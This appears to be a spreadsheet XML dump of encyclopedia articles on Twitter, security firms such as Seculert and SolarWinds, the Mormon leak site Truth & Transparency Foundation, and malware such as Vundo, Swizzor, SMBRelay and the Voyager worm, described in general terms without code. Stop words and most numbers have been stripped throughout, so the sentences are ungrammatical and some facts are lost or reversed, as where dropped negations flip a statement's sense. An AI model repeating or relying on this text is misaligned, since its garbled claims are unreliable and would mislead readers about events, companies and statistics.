phenomena, particularly musicians like lady gaga, justin bieber, rihanna direction, novel series twilight harry potter. twitter altered trend algorithm past prevent manipulation type limited success. twitter also censors trending hashtags claimed abusive offensive. twitter censored #thatsafrican #thingsdarkiessay hashtags users complained found hashtags offensive. lists late 2009, "twitter lists" feature added, making possible users follow lists users instead individual users. moments october 2015, twitter introduced "moments"—a feature allows users curate tweets users larger collection. twitter initially intended feature used in-house editorial team partners; populated dedicated twitter's apps, chronicling news headlines, sporting events, content. september 2016, creation moments became available twitter users. mobile twitter mobile apps iphone, ipad, android, windows windows phone, blackberry, nokia s40. april 2017, twitter introduced twitter lite, progressive designed regions unreliable slow internet connections, size less megabyte, designed devices limited storage capacity. adding following content there numerous tools adding content, monitoring content conversations including twitter's tweetdeck, salesforce.com, hootsuite, twitterfeed.com. 2009, fewer half tweets posted posted using user interface users using third-party applications (based analysis million tweets sysomos). twitter blue june 2021, twitter announced paid subscription service known twitter blue, provides additional premium features service: undo tweet, allows users withdraw tweet within short time frame posted. bookmarks, allows users save individual tweets folders. reader mode, converts threads tweets article-like view. selection color themes icons twitter mobile app. dedicated customer support. profile pictures, added january 2022. they displayed hexagon-shaped frame, rather circular like profile pictures. edit feature tweets development. customization navigation bar.the service initially released australia canada june 2021. november 2021, twitter blue launched zealand users. user monetization june 2021, company opened applications premium subscription options called super follows. this lets eligible accounts charge $2.99, $4.99 $9.99 month subscribe account. launch generated $6,000 first weeks.in 2021, twitter began testing feature android clients. feature allows users send monetary tips certain accounts, providing financial incentive content creators platform. optional users choose whether enable tips account. september 2021, twitter announced allow users users social network bitcoin. feature available users. previously, users could fiat currency using services square's cash paypal's venmo. twitter integrate strike bitcoin lightning wallet service. noted current time, twitter take money sent tips feature.on august 2021, twitter rolled ticketed spaces, twitter spaces hosts charge $999 access rooms. april 2022, twitter announced partner stripe (digital payments processor) piloting cryptocurrency payouts limited users platform. eligible users ticketed spaces super follows able receive earnings form coin, stablecoin whose value u.s. dollar. users also hold earnings crypto wallets, exchange cryptocurrencies. e-commerce july 2021, twitter launched test shop module, shopping extension directs customers brand's products official twitter account. feature initially launched us-based users ios. march 2022, twitter expanded test allow companies showcase products profiles.on november 2021, twitter announced live shopping feature platform. walmart first retailer test twitter’s livestream shopping platform. company stated part continuing efforts bring engaging experiences customers allow shop seamlessly also entertained. usage daily user estimates vary company publish statistics active accounts. february 2009 compete.com blog entry ranked twitter third used social network based count million unique monthly visitors million monthly visits. april 2017 statista.com blog entry ranked twitter tenth used social network based count million monthly visitors. global user base 2017 million. demographics 2009, twitter mainly used older adults might used social sites twitter, said jeremiah owyang, industry analyst studying social media. "adults catching teens years", said. according comscore twitter's users aged comscore attributed twitter's "early adopter period" social network first gained popularity business settings news outlets attracting primarily older users. however, comscore also stated 2009 twitter begun "filter mainstream", "along came culture celebrity shaq, britney spears ashton kutcher joined ranks twitterati".according study sysomos june 2009, women make slightly larger twitter demographic men—53% 47%. also stated users accounted activity york city twitter users cities.according quancast, million people used twitter september 2009; twitter users years old; twitter users caucasian, higher average (compared internet properties) african american/black (16%) hispanic (11%); twitter users total household income least us$60,000. prevalence african american twitter usage many popular hashtags subject research studies.on september 2011, twitter announced million active users logging least month million active users every day. march 2014, twitter announced million monthly active users (maus) million mobile maus. 2013, million users actively using twitter daily million tweets every day, users checking twitter multiple times day. 2019, twitter million monthly active users. majority twitter users skew american political left.in 2012, country active users twitter united states. 2016 research poll found twitter used online adults. equally popular women (24% online americans respectively), popular younger (36% 18–29 year olds) generations.a 2019 survey conducted foundation found twitter users likely general public college degree higher income average u.s. adult. users also three times likely younger years old, median adult u.s. users years old. survey found users active twitter responsible tweets, focusing mainly topics politics women. content antonio-based market-research firm pear analytics analyzed 2,000 tweets (originating united states english) two-week period august 2009 11:00 5:00 (cst) separated categories. pointless babble made 40%, conversational. pass-along value self-promotion spam news making despite jack dorsey's open contention message twitter short burst inconsequential information", social networking researcher danah boyd responded pear analytics survey arguing pear researchers labeled "pointless babble" better characterized "social grooming" "peripheral awareness" (which justifies persons "want[ing] know people around thinking feeling, even co-presence viable"). similarly, survey twitter users found specific social role passing along messages include hyperlink expectation reciprocal linking followers. levels according research published april 2014, around user accounts never tweeted. about americans ever used twitter, according 2019 research center survey. 2009, nielsen online reported twitter user-retention rate forty percent. many people stop using service month; therefore site potentially reach percent internet users. noting demographics twitter users differ average americans, commentators cautioned media narrativ</t>
  </si>
  <si>
    <t>Seculert</t>
  </si>
  <si>
    <t>seculert cloud-based cyber security technology company based israel. company's technology designed detect breaches advanced persistent threats (apts), attacking networks. seculert's business based malware research ability uncover malware gone undetected traditional measures.in 2012, company named hottest security start-ups york times, finalist magazine awards rookie security company year. history seculert founded 2010 former fraudaction research manager aviv raff, former sandisk product marketing manager dudi matot former finjan operations alex milstein. 2011, company launched first offering, seculert echo. their seculert sense, traffic analysis, released october 2012. conference february 2013 seculert unveiled beta version seculert swamp, malware analysis sandbox. seculert privately funded headquartered petah tikva, israel. july 2012, company announced $5.35m venture funding ventures norwest venture partners. july 2013, seculert announced raised additional million series funding sequoia capital.on january 2017, seculert acquired radware, company based mahwah, jersey, notable alerts january 2012, seculert discovered ramnit started targeting facebook accounts considerable success, stealing 45,000 facebook login credentials worldwide, mostly people france.in march 2012, seculert reported kelihos botnet, distributed facebook worm, still active spreading.in july 2012, seculert, conjunction kaspersky uncovered ongoing cyber espionage campaign targeting iran middle eastern countries dubbed mahdi (malware).in august 2012, seculert, kaspersky symantec revealed discovery shamoon, sophisticated malware attacked qatar's natural firm, rasgas saudi arabian company, aramco.in december 2012, seculert uncovered dexter, malware steals payment card data point-of-sale terminals used stores, hotels, businesses. most victim businesses english-speaking, percent based north america, percent u.k. dexter infected systems running variety different versions windows, including home server, server 2003, windows 7.in january 2013, kaspersky labs (kl) revealed cyber espionage operation dubbed october. next day, seculert identified special folder used attackers additional attack vector. vector, attackers sent email embedded link specially crafted page. this webpage exploited vulnerability java, background downloaded executed malware automatically.in january 2014, seculert research identified targeted attack used xtreme rat. this attack used spear phishing emails target israeli organizations deploy piece advanced malware. date, machines compromised including ones belonging israeli civil administration.the dyre wolf malware campaign made headlines early april banking trojan bypassed factor authentication order steal million corporate bank accounts. awards 2013 rookie security company, awards finalist magazine 2013 herring, europe finalists automated breach detection product several detection protection technologies combined cloud-based solution works identify cyber threats. automated traffic analysis cloud-based analysis engine leverages http/s gateway traffic logs collected time, analyzing petabytes data identify malware activity. automatically identifies unknown malware detecting malicious patterns anomalies. seculert traffic analysis pinpoints evidence targeted attacks.elastic sandbox elastic, cloud-based automated malware analysis environment. seculert elastic sandbox includes automatic analysis classification suspicious files time. analyzes potentially malicious files different platforms simulate different geographic regions. seculert elastic sandbox generates malware behavioral profiles crunching 40,000 malware samples daily basis leveraging data crowdsourced threat repository. references external links company website</t>
  </si>
  <si>
    <t>Trusona</t>
  </si>
  <si>
    <t>trusona american company based scottsdale, arizona, specializes identity theft protection created personal authentication technology fbi.trusona's founder eisen. according eisen, “all companies work fortune companies government agencies”.microsoft ventures existing investor, kleiner perkins caufield byers, joined million round financing trusona rethink traditional password. 2017, trusona announced support passwordless entry salesforce.com. references external links official website</t>
  </si>
  <si>
    <t>Truth &amp; Transparency Foundation</t>
  </si>
  <si>
    <t>truth transparency foundation (ttf; formerly mormonleaks originally mormon wikileaks) whistleblowing organization inspired wikileaks, focuses exposing documents leadership church jesus christ latter-day saints (lds church). began october 2016 leaked series videos youtube channel mormon leaks. total, videos initially leaked mormon leaks channel meetings high-ranking leaders including quorum twelve. they discussed topics including "homosexual agenda", subprime mortgage crisis, debate sexual orientation chelsea manning. politicians featured videos included former utah governor mike leavitt former u.s. senator oregon gordon smith. ryan mcknight, founder ttf, interviewed york times youtube channel mormon leaks, contacts reddit asked secure send files. website allow whistleblowers protect anonymity. submission process ensures confidentiality, including erasure addresses, asking leakers privacy browser tor, sending documents securedrop, additional encryption methods. initial funding raised gofundme, official twitter account site's intent increase transparency church leadership, would leak names lower-level employees, instead focusing quorum twelve first presidency. university tampa professor ryan cragun said scholars interested finding documents would revealed, noting dearth information available finances church. said active mormons unlikely view leaked materials, material would significant impact questioning already resigned membership status. mormon scholar columnist jana riess gave mixed assessment, criticizing tactics regarding privacy saying could help increase church leadership transparency. utah attorney mormon blogger steve evans said practice leaking criminal publication stolen property, said church employees leaked material likely violating non-disclosure agreement. organization beginnings youtube ryan mcknight, site's founder, previously gained attention october 2016 interviewed york times youtube channel mormon leaks, released videos leadership executive discussions. mcknight former mormon, resigned church 2014, residing vegas, nevada. anonymous individual sent videos email, according mcknight, holding onto period years intention something eventually. within time span month youtube channel garnered 2,200 followers.the church publicly question veracity videos, included leadership debating "homosexual agenda". additional topics discussed high-level church leadership videos included marijuana, islam, subprime mortgage crisis, debate sexual orientation chelsea manning. church spokesman eric hawkins provided official response, stated: committee meetings, presentations routinely received various religious, political subject matter experts various topics. purpose understand issues face church, pursuit obligation church leaders feel informed open discussion current issues. this informational forum, decision-making body." hawkins pointed videos timeframe 2007 2012.in total videos published youtube last october 2016 general conference. most videos closed session events attended high-level church leadership. majority depicted lectures given quorum twelve, second-highest ranking leadership group within church. mike leavitt, former governor utah, appeared video filmed 2012 gave presentation state religious freedom restoration acts. gordon smith, former u.s. senator oregon, shown another video talking church leadership. smith lectured church leaders "inestimable power" yielded able contact u.s. senators whenever necessary assistance. lectures given church leadership fashion businesslike, statistics microsoft powerpoint presentations.mcknight suddenly found point-person internet wishing maintain anonymity simultaneously publicize secret documents church. after videos engendered debate attention mormons wider internet community, mcknight asked videos people messaged reddit. after another anonymous user reddit asked him, publicized documents church detailing rules modification homosexual partners. reddit users asked secure means submitting documents church. transition dedicated website mcknight decided found whistleblowers could protect anonymity. since increased attention october videos november policy change leaks, mcknight contacted sources inside outside church potential material release. mcknight team spent months planning creation organization. estimated approximately potential hundreds thousands additional invididuals wish leak information site. organization affiliation fred karger website mormontips.com, also publicizes confidential documents church. mormonleaks takes steps protect confidentiality sources, including erasing addresses submissions removing watermarks submitted materials. site asks users wish submit secret documents privacy browser protect themselves. users send documents securedrop. encryption methods incorporated mask identity whistleblowers. motivation behind organization increase transparency church leadership.the website (then "mormonleaks") launched december 2016. organization started website accompanying twitter page. team works verify documents posting live. this fact-checking team includes five volunteers attorney. mormonleaks take funding advertising. funds start initially raised donations gofundme. hope founder would demonstrate church's profitable nature business opposed assertion religious status. founder said highly unlikely church would voluntarily publicize innermost proceedings, saying "will never voluntarily transparent, nothing gain it". site's intention avoid publishing specific lists names membership, instead focus economic information internal organization policies procedures. site intended limit disclosure actual people's names high-ranking officials including quorum twelve first presidency.the organization's first leaks appeared december 2016, form church documents 2010. published four files onto account facebook december 2016. first documents publicized included memos legal procedures, letter temple department's executive director regarding unsanctioned materials internet, organizational chart intellectual property division church. asserts offered documents separate individuals employees church concerning tithing information famous mormons, including american football quarterback steve young.after (then "mormonleaks") posted handful number church documents four months, church sent cease-and-desist letter alleging copyright infringement regard leaked church leadership powerpoint presentation published february 2017. powerpoint discussed societal pressures church felt members apostasy, included pornography, issues agitated ordain women, questions regarding mormon history promoted books lawyer fundamentalist mormon denver snuffer online postings psychologist social critic john dehlin. pulled offending document short while, attorney, marc randazza, sent church letter said, point, client willing bygones bygones. client willing step back brink, cease efforts censor material, client willing refrain bringing claim abusing copyright law]." faithleaks 2018, mcknight dodge launched faithleaks, similar website. faithleaks hosts documents relation transparency jehovah's witnesses. initially published papers internal investigation alleged sexual abuse. these exemplify attempted deal cases congregation's internal disciplinary court. faithleaks hoped help highlight cases corruption religious organizations, particularly concerned issues finance, policies, procedures abuse settlements. after settlement watch tower bible tract society pennsylvania copyrighted documents removed truth transparency, founders, ryan mcknight ethan gregory dodge, forbidden publish copyrighted material owned watch tower society again. reception wikileaks aware foundation site's original name mormonwikileaks, sent message twitter asking change name. founder originally stated would retain name mormonwikileaks, said trademark application pending.university tampa professor ryan cragun said academics excited discover information economics behind church, members tithe percent earnings much transparent documents available research holdings finances. cragun said unlikely active members church would viewing leaked documents "highly insulated". however, notes documents would greater impact someone considering leaving church: "for someone middle faith transition, information fuel fire."editor-in-chief nonprofit quarterly, ruth mccambridge, wrote appearance mormonleaks reflective increasing trend individuals technology force nonprofit organizations transparent accountable public. mormonleaks attorney staff, mccambridge notes beneficial given prior litigation history church made copyright infringement assertion wikileaks publishing church's handbook instructions.mormon scholar columnist jana riess critical organization's tactics, stating: concerned privacy culture generally. people workplace right expect intraoffice communication emails stay private." called mormonleaks "disturbing" said: good news us." positive note, riess said could motivate upper church leadership increase transparency.utah attorney mormon blogger steve evans called (then "mormonleaks") rebranding exercise mcknight's existing practice posting various confidential items." evans said added layer cybersecurity, necessarily protect leakers, depending methods obtaining various stolen documents, videos, etc." evans critical mcknight's encouragement choose leak information ttf: "the leakers likely either church employees consultants working church. either situations, likely leakers violating nondisclosure confidentiality agreements church. mcknight publicly encouraging people violate agreements." also references external links official website john dehlin (march 2017). "(interview): mormonleaks founders ryan mcknight scott fausett" (video). mormon stories podcast.</t>
  </si>
  <si>
    <t>Swizzor</t>
  </si>
  <si>
    <t>swizzor trojan horse. this trojan program windows file, size. numerous aliases downloader.swizzor (avg) trojan-downloader.win32.swizzor.cc (kaspersky lab) trojan.swizzor (doctor web), troj/swizzor-cc (sophos), troj_swizzor.cc (trend micro), trojan.downloader.swizzor.cc (softwin), suspect file (panda), win32/trojandownloader.swizzor.cc (eset) tr/dldr.swizzor.gen (avira)the trojan works downloading launching files internet infected machine. trojan rated medium risk. references</t>
  </si>
  <si>
    <t>SMBRelay</t>
  </si>
  <si>
    <t>smbrelay smbrelay2 computer programs used carry man-in-the-middle (mitm) attacks windows machines. they written dystic cult dead (cdc) released march 2001 @lantacon convention atlanta, georgia. more seven years release, microsoft released patch fixed hole exploited smbrelay. this fixes vulnerability reflected back client. forwarded another host, vulnerability still exploited. smbrelay smbrelay receives connection port relays packets client server connecting windows machine originating computer's port 139. modifies packets necessary. after connecting authenticating, target's client disconnected smbrelay binds port address. this relay address connected directly using "net \\192.1.1.1" used networking functions built windows. program relays traffic, excluding negotiation authentication. long target host remains connected, user disconnect reconnect virtual smbrelay collects ntlm password hashes writes hashes.txt format usable l0phtcrack cracking later time. port privileged port requires administrator access use, smbrelay must administrator access account. however, since port needed netbios sessions, difficult block. according dystic, "the problem marketing standpoint, microsoft wants products much backward compatibility possible; continuing protocols known issues, continue leave customers risk exploitation... these are, again, known issues existed since protocol. this fundamental design flaw. assume nobody used method exploit people silly; took less weeks write smbrelay." smbrelay2 smbrelay2 works netbios level across protocol netbios bound (such nbt). differs smbrelay uses netbios names rather addresses. smbrelay2 also supports man-in-the-middling third host. however, supports listening name time. also pass hash references external links man-in-the-middle attack dystic symantec security bulletin disable authentication windows lists affected operating systems your field guide designing security into networking protocols extended protection authentication</t>
  </si>
  <si>
    <t>Software forensics</t>
  </si>
  <si>
    <t>software forensics science analyzing software source code binary code determine whether intellectual property infringement theft occurred. centerpiece lawsuits, trials, settlements companies dispute issues involving software patents, copyrights, trade secrets. software forensics tools compare code determine correlation, measure used guide software forensics expert. past methods software forensics past methods code comparison included hashing, statistical analysis, text matching, tokenization. these methods compared software code produced single measure indicating whether copying occurred. however, measures accurate enough admissible court results accurate, algorithms could easily fooled simple substitutions code, methods take account fact code could similar reasons copying. copyright infringement following software tools compare code determine amount correlation, expert iterative filtering process determine correlated code third-party code, code generation tools, commonly used names, common algorithms, common programmers, copying. correlation copying, copier authority rights holder, copyright infringement occurred. trade secret protection infringement software contain trade secrets, provide competitive advantage business. determine trade secret theft, tools processes used detect copyright infringement. code copied without authority, code characteristics trade secret—it generally known, business keeps secret, secrecy maintains value business—then copied code constitutes trade secret theft. trade secret theft also involve taking code functionality without literally copying code. comparing code functionality difficult problem accomplished algorithm reasonable time. reason, finding theft code functionality still mostly manual process. patent infringement trade secret functionality, currently possible scientifically detect software patent infringement, software patents cover general implementation rather specific source code. example, program implements patented invention written many available programming languages, using different function names variable names performing operations different sequences. there many combinations ways implement inventions software even powerful modern computers cannot consider combinations code might infringe patent. this work still left human experts using knowledge experience, problem many software forensics trying automate finding algorithm simplifying process. objective facts subjective evidence important rule forensic analysis objective facts must considered first. reviewing comments code searching internet find information companies distribute code programmers wrote code useful objective facts regarding correlation considered. once analysis performed using forensic tools procedures, analysts begin looking subjective evidence like comments code. information subjective evidence conflicts objective analysis, analysts need doubt subjective evidence. fake copyright notices, open source notifications, programmer names added source code copying took place, order disguise copying, uncommon real-world cases code theft. references</t>
  </si>
  <si>
    <t>Vundo</t>
  </si>
  <si>
    <t>vundo trojan (commonly known vundo, virtumonde virtumondo, sometimes referred juan) either trojan horse computer worm known cause popups advertising rogue antispyware programs, sporadically misbehavior including performance degradation denial service websites including google facebook. also used deliver malware host computers. later versions include rootkits ransomware. infection vundo infection typically caused either opening e-mail attachment carrying trojan, variety browser exploits, including vulnerabilities popular browser plug-ins, java. many popups advertise fraudulent programs antispywaremaster, winfixer, antivirus 2009. virtumonde.dll consists main components, browser helper objects class each components windows registry hkey local machine, file names dynamic. attaches system using bogus browser helper objects files attached winlogon.exe, explorer.exe recently, lsass.exe. vundo inserts registry entries suppress windows warnings disabling firewall, antivirus, automatic updates service, disables automatic updates service quickly re-disables manually re-enabled, attacks malwarebytes' anti-malware, spybot search destroy, lavasoft ad-aware, hijackthis, several malware removal tools. frequently hides vundofix combofix. rather pushing fake antivirus products, "ad" popups drive download attacks copies major corporations, faked simply closing allows drive-by download exploit insert payload user's computer. symptoms since many different varieties vundo trojans, symptoms vundo vary widely, ranging relatively benign severe. almost varieties vundo feature sort pop-up advertising well rooting make difficult delete. computers infected exhibit following symptoms: vundo cause infected browser advertisements, many claim need software system "deterioration". desktop background changed image installation window saying adware computer. screensaver changed blue screen death. display properties control panel, background screensaver tabs missing "hide" values registry changed both background screensaver system32 folder, however screensaver cannot deleted. windows automatic updates (and web-based services) also disabled possible turn back infected dlls files (with randomized names "__c00369ab.dat" "slmnvnk.dll") present windows/system32 folder references dlls found user's start (viewable msconfig), registry, browser add-ons internet explorer. vundo attempt prevent user removing otherwise impede operation, disabling task manager, registry editor, msconfig, thereby preventing system booting safe mode. some firewalls antivirus software also disabled vundo leaving system even vulnerable. especially, disables norton antivirus turn uses spread infection. norton show prompts enable phishing filter, itself. upon pressing connect real-av.org download malware. popular anti-malware programs spybot search destroy malwarebytes deleted immediately closed upon loading. renaming program executable work around this. malwarebytes's executable deleted soon installed (depending system's infection). installing program another computer copying executable infected computer's malwarebytes directory usually works too. access also negatively affected. vundo cause many websites inaccessible. search engine links redirected rogue security software sites, avoided copy pasting addresses. juan cause webpages fail load sessions browsing present blank page browser instead webpage. when happens programs also fail start become impossible windows shutdown. hard drive start constantly accessed winlogon.exe process, thus periodic freezes experienced. display pop-ups also additionally efficient injecting promotions search results. warnings supermwindow shutting occur. explorer.exe constantly crash resulting endless loop crashing restarting. creates virus critical driver c:\windows\system32\drivers (ati0dgxx.sys). virus "eat" away available hard drive space; hard drive space fluctuate much space, evident vundo's attempt "hiding" antagonized. vundo impede download progress. entering safe mode attempting hijackthis results true blue screen death, cannot recovered without either restoring deleted safe mode registry keys, reinstalled version windows. virus sometimes gives "run app" error randomly named dlls deleted. virus rewrite randomly named dlls reside machine. virus changes \hkey_local_machine\software\microsoft\windows\currentversion\run runonce entries start windows starts. virus installs adware sometimes pornographic. virus installs rogue security software desktop defender 2010 security center .wav file telling user system infected. virus cause network driver corrupt even going registry editor (regedit.exe) delete winsock trying reinstall driver virtually impossible. virus deletes network connection network places. references</t>
  </si>
  <si>
    <t>Vulcanbot</t>
  </si>
  <si>
    <t>vulcanbot name trojan botnet predominantly spread vietnam, apparently political motives. thought started spreading late 2009. botnet began spread website vietnamese professionals society (vps.org) hacked legitimate vietnamese keyboard driver vpskeys hosted site replaced backdoored version. google posted blog believed botnet thus created used predominantly ddos bloggers critical bauxite mining vietnam, thus making politically motivated attack. mcafee compared operation aurora, also active 2009, found unrelated. approximately 15,000 computers infected. since government vietnam also seeking suppress criticism 2010, suggested government-backed. references</t>
  </si>
  <si>
    <t>Voyager (computer worm)</t>
  </si>
  <si>
    <t>voyager worm computer worm posted internet october 2005, designed target oracle databases. known variants first, non-malicious, example: october 2005. second example: december 2005; attempts stop remote oracle listeners machines properly secured. affected platforms operating system running oracle databases actions october variant harmless payload, could easily modified. december 2005 version attempts create private database links affected databases, procedure spread missing. activated, grant public. after logon trigger run, performs google search code. worm code tries mail username password hashes larry@oracle.com oracle@random address. tricks user reset password well known database user. clear intention increase chances successfully creating private link database. spread october variant tries find oracle databases subnet uses private database links connect remote databases. december variant posted incomplete, without spreading mechanism. outbreaks october 2005 first posted internet december 2005 malicious variant (incomplete) posted internet references external links database security (oracle corp) security checklist (oracle corp) (pdf file) voyager worm described application security inc. analysis voyager worm red-database-security gmbh</t>
  </si>
  <si>
    <t>Software token</t>
  </si>
  <si>
    <t>software token (a.k.a. soft token) piece two-factor authentication security device used authorize computer services. software tokens stored general-purpose electronic device desktop computer, laptop, pda, mobile phone duplicated. (contrast hardware tokens, credentials stored dedicated hardware device therefore cannot duplicated absent physical invasion device) because software tokens something physically possess, exposed unique threats based duplication underlying cryptographic material example, computer viruses software attacks. both hardware software tokens vulnerable bot-based man-in-the-middle attacks, simple phishing attacks one-time password provided token solicited, supplied genuine website timely manner. software tokens benefits: physical token carry, contain batteries out, cheaper hardware tokens. security architecture there primary architectures software tokens: shared secret public-key cryptography. shared secret, administrator typically generate configuration file end-user. file contain username, personal identification number, secret. this configuration file given user. shared secret architecture potentially vulnerable number areas. configuration file compromised stolen token copied. with time-based software tokens, possible borrow individual's laptop, clock forward, generate codes valid future. software token uses shared secrets stores alongside shared secret software client stolen subjected offline attacks. shared secret tokens difficult distribute, since token essentially different piece software. each user must receive copy secret, create time constraints. some newer software tokens rely public-key cryptography, asymmetric cryptography. this architecture eliminates traditional weaknesses software tokens, affect primary weakness (ability duplicate). stored remote authentication server instead token client, making stolen software token good unless known well. however, case virus infection cryptographic material duplicated captured (via keylogging similar) next time user authenticates. attempts made guess pin, detected logged authentication server, disable token. using asymmetric cryptography also simplifies implementation, since token client generate pair exchange public keys server. also authentication electronic authentication google authenticator multi-factor authentication security token references external links microsoft abandon passwords, banks 2-factor authentication 2006</t>
  </si>
  <si>
    <t>Volcano Security Suite</t>
  </si>
  <si>
    <t>volcano security suite piece harmful security software disguises antispyware program. issues false messages alerts, false system scan results computer scare people full version rogue software. part fakevimes family. symptoms infection attempts disable legitimate antivirus programs. also hijack internet explorer. also displays false alerts stating computer infected malware. removal volcano security suite detected removed certain antivirus antispyware like spyhunter malware suite, well malwarebytes antimalware. also rogue security software references</t>
  </si>
  <si>
    <t>SolarWinds</t>
  </si>
  <si>
    <t>solarwinds corporation american company develops software businesses help manage networks, systems, information technology infrastructure. headquartered austin, texas, sales product development offices number locations united states several countries. company publicly traded 2009 2015, october 2018. also acquired number companies, still operates original names, including pingdom, papertrail loggly. 300,000 customers december 2020, including nearly fortune companies numerous federal agencies.a solarwinds product, orion, used 33,000 public private sector customers, focus large-scale attack disclosed december 2020. attack persisted undetected months 2020, additional details breadth depth compromised systems continued surface initial disclosure. february 2021, microsoft president brad smith said "the largest sophisticated attack world ever seen". history solarwinds began 1999 tulsa, oklahoma, co-founded donald yonce former executive walmart) brother david yonce. solarwinds released first products, trace route ping sweep, earlier march 1998 released first web-based network performance monitoring application november 2001. according michael bennett, became chief executive officer 2006, name solarwinds chosen early employee company nothing solar wind power. 2006, company moved headquarters austin, texas, company's total employees based 2011. company profitable founding 2009.during 2007, solarwinds raised funding austin ventures, bain capital, insight venture partners. solarwinds completed initial public offering us$112.5 million 2009, closing higher prices initial trading. solarwinds followed another opentable online restaurant-reservation service), perceived break spell great recession, companies went public. both bain capital insight venture partners backed used opportunity sell shares offering.analysts company executives anticipated continued expansion post-ipo, including several acquisitions. 2010, bennett retired replaced company's former chief financial officer kevin thompson. 2013, solarwinds announced plans invest operations salt lake city, utah. named forbes "best small company america, citing high-functioning products costs impressive company growth." 2013, solarwinds employed people.acquisition private equity technology investment firms silver lake partners thoma bravo, llc. announced late 2015, january 2016, solarwinds taken private $4.5 billion deal. time, company 1,770 employees worldwide based austin, reported revenues half billion dollars year.in november 2017, solarwinds released appoptics integrates much software portfolio, including librato traceview, single software-as-a-service package. appoptics included compatibility amazon services microsoft azure.in september 2018, solarwinds filed public offering again, three years owned private equity firms. solarwinds completed public offering october 2018.on december 2020, kevin thompson retired, replaced sudhakar ramakrishna, pulse secure, effective january 2021.on january 2021, solarwinds hired former cisa director chris krebs help company work recent cyber attack.in july 2021, solarwinds separated managed service provider (msp) business main company. separately-traded public company named n-able. acquisitions according wall street journal, solarwinds offers freely downloadable software potential clients markets advanced software offering trial versions. following funding 2007, solarwinds acquired several companies including neon software ipmonitor corp. opened european sales office ireland.during 2009, solarwinds acquired number companies products, including acquisition zealand–based software maker kiwi enterprises, announced january 2009.solarwinds acquired several companies 2011 ranked number forbes magazine's list fastest-growing tech companies. january 2011, acquired hyper9 inc, austin-based virtualization management company undisclosed terms. july, solarwinds completed acquisition idaho-based network security company trigeo million. trigeo's offices post falls added list solarwinds location already included satellite offices dallas, salt lake city, tulsa, well operations australia, czech republic, india, ireland, singapore. 2012 solarwinds acquired patch management software provider eminentware, rhinosoft, adding latter company's voyager product solarwinds' product suite.in early 2013, solarwinds acquired n-able technologies, cloud-based information technology services provider. deal reportedly valued $120 million cash. late 2013, acquired boulder, colorado–based database performance management company confio software. with $103 million agreement, solarwinds gained sales office london confio's main product, ignite. between 2014 2015, company acquired swedish web-monitoring company pingdom, francisco–based metrics monitoring company librato (for million), management service papertrail (for million).between 2015 2020, solarwinds acquired librato monitoring company), capzure technology manager software n-able solarwinds previously acquired), logicnow remote monitoring software company), spamexperts email security company), loggly management analytics company), trusted metrics provider threat monitoring management software), samanage service desk asset management provider), vividcortex database performance monitor), sentryone provider database performance monitoring). 2019–2020 supply chain attacks sunburst december 2020, washington post reported multiple government agencies breached solarwinds's orion software (archived website copy). company stated filing fewer 18,000 33,000 orion customers affected, involving versions 2019.4 2020.2.1, released march 2020 june 2020. according microsoft, hackers acquired superuser access saml token-signing certificates. this saml certificate used forge tokens allow hackers trusted highly privileged access networks. cybersecurity infrastructure security agency issued emergency directive 21–01 response incident, advising federal civilian agencies disable orion.apt29, cozy bear, working russian foreign intelligence service (svr), reported behind 2020 attack. victims attack include cybersecurity firm fireeye, treasury department, department commerce's national telecommunications information administration, well department homeland security. prominent international solarwinds customers investigating whether impacted include north atlantic treaty organization (nato), european parliament, government communications headquarters, ministry defence, national health service (nhs), home office, astrazeneca. fireeye reported hackers inserted "malicious code legitimate software updates orion software allow attacker remote access victim's environment" found "indications compromise dating back spring 2020". fireeye named malware sunburst. microsoft called solorigate.the attack used backdoor solarwinds library; update solarwinds occurred, malicious attack would unnoticed trusted certificate. november 2019, security researcher notified solarwinds server weak default password "solarwinds123", warning "any hacker could upload malicious [code]" would distributed solarwinds customers. york times reported solarwinds employ chief information security officer employee passwords posted github 2019.on december 2020, solarwinds reported breach securities exchange commission. however, solarwinds continued distribute malware-infected updates, immediately revoke compromised digital certificate used sign them.on december 2020, german news portal heise.de reported solarwinds time encouraging customers disable anti-malware tools installing solarwinds products.on december 2020, solarwinds said would revoke compromised certificates december 2020.on december 2020, attorney general william barr stated believed solarwinds hack appears perpetrated russia, contradicting speculations president donald trump china, russia, might blame.in late december 2020, trustwave, cybersecurity firm, reached solarwinds report security flaws discovered software produced solarwinds. although vulnerabilities taken advantage hackers, raised questions concerning network security solarwinds' customers.the magnitude monetary damage calculated, january 2021, crn.com reported attack could cost cyber insurance firms least million.on march 2021, solarwinds ceo, sudhakar ramakrishna, blamed company intern using insecure password ("solarwinds123") update server. speculation attack discounted company security professionals. more intern using weak password, experts noted main issue fact highlights poor security culture company has. supernova december 2020, microsoft said investigations supply chain attacks solarwinds found evidence attempted supply chain attack distinct attack sunburst malware inserted orion binaries (see previous section). this second attack dubbed supernova.security researchers palo alto networks said supernova malware implemented stealthily. supernova comprises small number changes orion source code, implementing shell acts remote access tool. shell assembled in-memory supernova execution, thus minimizing forensic footprint.unlike sunburst, supernova possess digital signature. this among reasons thought originated different group responsible sunburst. insider trading investigation solarwinds's share price fell within days sunburst breach becoming public knowledge, within week. insiders company sold approximately $280 million stock shortly became publicly known, months attack started. spokesperson said sold stock aware breach time. microsoft guidance service provider downstream business attacks november 2021 microsoft issued alert relation advanced persistent threat (apt) actor nobelium (aka apt29; cozy bear) responsible 2020 solarwinds supply chain attack targeting cloud service providers (csps), managed service providers (msps), service providers. microsoft threat intelligence center (mstic) released range recommendations service providers downstream businesses implement order address threat. class action lawsuit january 2021, class action lawsuit filed solarwinds relation security failures subsequent fall share price. solarwinds attempted case dismissed march 2022, judge ruled class action lawsuit move forward. references external links official website business data solarwinds inc.:</t>
  </si>
  <si>
    <t>Voice phishing</t>
  </si>
  <si>
